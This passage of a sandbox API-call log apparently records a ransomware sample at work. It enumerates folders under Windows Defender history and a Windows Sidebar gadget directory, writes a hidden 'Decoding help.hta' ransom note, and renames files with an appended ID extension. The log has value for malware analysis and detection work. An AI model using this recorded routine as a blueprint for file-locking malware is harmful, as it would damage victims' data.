lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Results" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0054.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" [0054.558] GlobalMemoryStatus (in: lpBuffer=0x2681fd10 | out: lpBuffer=0x2681fd10) [0054.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.561] CloseHandle (hObject=0x808) returned 1 [0054.561] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Service", cAlternateFileName="")) returned 1 [0054.561] lstrcmpW (lpString1=".", lpString2="Service") returned -1 [0054.561] lstrcmpW (lpString1="..", lpString2="Service") returned -1 [0054.561] lstrcmpiW (lpString1="windows", lpString2="Service") returned 1 [0054.564] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.564] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 67 [0054.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Service" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0054.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" [0054.565] GlobalMemoryStatus (in: lpBuffer=0x2681fd10 | out: lpBuffer=0x2681fd10) [0054.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7a8420, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.570] CloseHandle (hObject=0x808) returned 1 [0054.570] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 1 [0054.570] lstrcmpW (lpString1=".", lpString2="Store") returned -1 [0054.570] lstrcmpW (lpString1="..", lpString2="Store") returned -1 [0054.570] lstrcmpiW (lpString1="windows", lpString2="Store") returned 1 [0054.573] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.573] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 67 [0054.573] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Store" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0054.573] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*" [0054.573] GlobalMemoryStatus (in: lpBuffer=0x2681fd10 | out: lpBuffer=0x2681fd10) [0054.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7d84f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.579] CloseHandle (hObject=0x808) returned 1 [0054.579] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 0 [0054.579] FindClose (in: hFindFile=0x6716b0 | out: hFindFile=0x6716b0) returned 1 Thread: id = 831 os_tid = 0x3d0 [0054.556] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*", lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6713f0 [0054.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.557] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.557] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.557] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0054.557] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0054.557] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0054.557] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0054.557] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0054.557] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0054.557] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" [0054.557] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*.*" [0054.557] GlobalMemoryStatus (in: lpBuffer=0x2695fd10 | out: lpBuffer=0x2695fd10) [0054.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ba028, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x810 [0054.560] CloseHandle (hObject=0x810) returned 1 [0054.560] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0054.560] lstrcpyW (in: lpString1=0x11701b50, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0054.560] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0054.560] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" [0054.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.560] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7c0 [0056.931] WriteFile (in: hFile=0x7c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2695fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2695fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.435] CloseHandle (hObject=0x7c0) returned 1 [0058.436] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.436] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.436] lstrlenW (lpString="gadget.xml") returned 10 [0058.436] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.436] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.436] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" [0058.436] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" [0058.436] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.436] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.436] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.436] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.436] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.437] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.437] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js" [0058.437] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*" [0058.437] GlobalMemoryStatus (in: lpBuffer=0x2695fd10 | out: lpBuffer=0x2695fd10) [0058.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9702160, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7c0 [0058.438] CloseHandle (hObject=0x7c0) returned 1 [0058.438] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1910, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0058.438] lstrcpyW (in: lpString1=0x11701b50, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" [0058.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0058.438] lstrlenW (lpString="settings.html") returned 13 [0058.438] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" [0058.438] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" [0058.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.439] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideShow.html", cAlternateFileName="")) returned 1 [0058.439] lstrcpyW (in: lpString1=0x11701b50, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.439] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" [0058.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.439] lstrcmpiW (lpString1="Decoding help.hta", lpString2="slideShow.html") returned -1 [0058.439] lstrlenW (lpString="slideShow.html") returned 14 [0058.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0058.439] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned 77 [0058.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\", lpString2="slideShow.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" [0058.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" [0058.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\slideShow.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\slideshow.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.440] FindNextFileW (in: hFindFile=0x6713f0, lpFindFileData=0x2695fd30 | out: lpFindFileData=0x2695fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideShow.html", cAlternateFileName="")) returned 0 [0058.440] FindClose (in: hFindFile=0x6713f0 | out: hFindFile=0x6713f0) returned 1 Thread: id = 832 os_tid = 